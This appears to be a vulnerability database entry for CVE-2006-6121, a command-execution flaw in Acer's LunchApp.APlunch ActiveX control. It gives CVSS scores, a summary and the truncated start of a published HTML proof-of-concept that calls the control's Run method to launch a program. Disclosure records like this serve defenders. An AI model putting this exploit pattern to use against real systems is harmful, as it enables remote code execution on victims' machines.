9.3
CVSSv2

CVE-2006-6121

Published: 26/11/2006 Updated: 17/10/2018
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Acer Notebook LunchApp.APlunch ActiveX control allows remote malicious users to execute arbitrary commands by calling the Run method.

Vulnerable Product Search on Vulmon Subscribe to Product

acer lunchapp.aplunch

Exploits

<!-- Author: Tan Chew Keong Site: vulnsg/ Acer Notebook LunchAppAPlunch ActiveX Control Command Execution Exploit --> <html> <body> <object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha"> </object> <script> hahahaRun("c", "\\windows\\system32\\calcexe", ""); </script> </htm ...